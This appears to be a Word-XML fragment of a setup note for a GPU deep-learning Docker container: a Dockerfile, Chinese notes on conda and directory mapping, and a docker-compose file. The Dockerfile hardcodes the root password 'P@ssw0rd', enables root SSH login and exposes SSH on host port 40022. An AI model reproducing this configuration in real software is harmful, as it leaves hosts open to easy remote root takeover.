    <w:p w14:paraId="7B5A7126" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3B351" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FROM nvidia/cuda:12.0.1-devel-ubuntu22.04 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F315A6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F92585F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ENV TZ="Asia/shanghai"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5510E5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ENV DEBIAN_FRONTEND=noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16761FF9" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB553D2" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># config apt sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D7A40" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427D6B9" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57653925" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># cuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E1449" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN sed -i 's/developer.download.nvidia.com/developer.download.nvidia.cn/g' /etc/apt/sources.list.d/cuda-ubuntu2204-x86_64.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D182D" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73454026" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN apt update \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAEEC9" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; apt install -y gcc python3 python3-pip ssh net-tools vim \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18676DF6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; apt autoclean \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F24125" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA0CEC" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268E8377" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN ln -sf /usr/bin/python3 /usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44563BE1" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4403CD" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN /usr/bin/pip config set global.index-url https://mirrors.ustc.edu.cn/pypi/web/simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5299E1" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE60E60" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN env &gt; /etc/environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C25736" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38988078" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WORKDIR /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D854ADE" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D96073C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA04171" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RUN mkdir /var/run/sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB722D" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># change root password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3658184B" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUN echo 'root:P@ssw0rd' | chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8B6F5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/g' /etc/ssh/sshd_config </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FBA4F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>EXPOSE 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B325C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686795BD" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CMD ["/usr/sbin/sshd","-D"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E854D8" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340BC380" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>容器中未增加CUDNN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257E7F5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>增加conda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A6F68" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>映射conda缓冲目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40B49C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>映射model目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D979D" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>pytorch tensorflow通过conda管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8E6528" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>映射一个端口出去，方便后续demo演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACBAAF0" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ace-line"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>映射目录：/root/.cache  /root/anaconda3/envs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269993F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>修改后的</w:t>
      </w:r>
      <w:r>
        <w:t>docker-compose.yaml</w:t>
      </w:r>
      <w:r>
        <w:t>如下，仅供参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828DA7C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72527D4B" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619D9391" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532FC1C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFEC797" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dl-env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3BCACB" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    build: ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF868C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    image: blingsec/deeplearn-env:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76395032" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    container_name: deeplearn-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC675DE" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #command: nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4881C" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02067870" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D470122" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        reservations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380341C8" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          devices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF6A9F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            - driver: nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA5537" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              count: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593F7C6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              capabilities: [gpu]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189523C6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8A294A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "40022:22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EC4DD" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "40080:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB328FB" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37DEBB" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ../models:/data/models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53687297" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ../project:/data/project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900EFB5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ../cache:/root/.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8DF53" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ../anaconda3:/root/anaconda3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C548F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ../.bashrc:/root/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164D0E2" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      - ../.condarc:/root/.condarc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE4D43" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6D10A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - dl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E5455" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329629B4" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CABCBA" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6F959" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8893A3" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    driver: bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594B8EA" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、其中</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t>是将安装完的直接映射到本地，目前测试，没发现和系统强关联</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586EE01" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:t>tuna,tsinghua</w:t>
      </w:r>
      <w:r>
        <w:t>的源，在安装过程中容易自动安装</w:t>
      </w:r>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:t>版本，如果遇到这种情况，清除镜像源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04658617" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
